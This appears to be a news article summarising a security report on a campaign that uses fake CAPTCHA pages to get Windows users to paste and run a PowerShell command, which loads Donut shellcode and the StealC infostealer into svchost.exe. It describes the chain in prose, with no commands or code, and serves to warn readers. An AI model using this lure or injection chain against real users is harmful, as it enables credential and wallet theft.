Fraudsters have devised a sophisticated new strategy that leverages counterfeit CAPTCHA confirmation pages to deploy StealC, an information-stealing malware targeting Windows systems. This alarming trend was highlighted by TechRepublic, referencing a detailed report from LevelBlue.
The Mechanism of Deception
The attack begins when unsuspecting users navigate to compromised websites that appear legitimate. Here, they encounter a seemingly standard CAPTCHA security check, which is, in fact, a cleverly disguised trap. Malicious JavaScript embedded within these sites triggers the display of a fake CAPTCHA page, prompting users to engage in a series of actions to verify their identity.
Unlike traditional CAPTCHAs that require visual identification, this ruse instructs users to execute a specific sequence of keystrokes: pressing Win + R, followed by Ctrl + V, and finally hitting Enter. This seemingly innocuous action runs a malicious PowerShell command that has been stealthily copied to the clipboard.
The Payload Unleashed
Upon completion of this deceptive verification, a PowerShell script is activated. This script establishes a connection to a remote server, downloading a meticulously crafted piece of malicious code, known as shellcode, generated using the Donut tool. Once loaded into memory, this code initiates a 64-bit PE loader that retrieves the final StealC payload, subsequently injecting it into svchost.exe, a legitimate Windows service process. This integration allows the malware to blend seamlessly into normal system operations.
Consequences of Infection
Once embedded within the victim’s computer, StealC embarks on a data collection spree, harvesting sensitive information such as browser credentials, email data, cryptocurrency wallet details, and system specifications. The implications of this data theft are severe, enabling fraud, account hijacking, and potential migration to other systems.
Compounding these risks is the malware’s multi-stage infection chain, which primarily operates within the system’s RAM. This characteristic significantly hampers detection and analysis efforts, leaving victims vulnerable to ongoing exploitation.
